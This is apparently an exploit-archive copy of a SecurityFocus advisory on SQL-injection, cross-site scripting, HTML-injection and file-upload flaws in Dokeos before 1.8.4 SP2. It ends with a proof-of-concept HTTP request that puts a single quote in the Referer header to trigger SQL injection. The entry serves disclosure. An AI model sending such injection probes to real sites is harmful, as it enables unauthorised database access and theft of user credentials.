15 lines
No EOL
822 B
Text
15 lines
No EOL
822 B
Text
source: https://www.securityfocus.com/bid/27792/info
|
|
|
|
Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.
|
|
|
|
Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Versions prior to Dokeos 1.8.4 SP2 are affected.
|
|
|
|
GET /dokeos/index.php HTTP/1.0
|
|
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
|
|
Accept: */*
|
|
Accept-Language: en-US
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
|
|
Host: localhost
|
|
Referer: ' |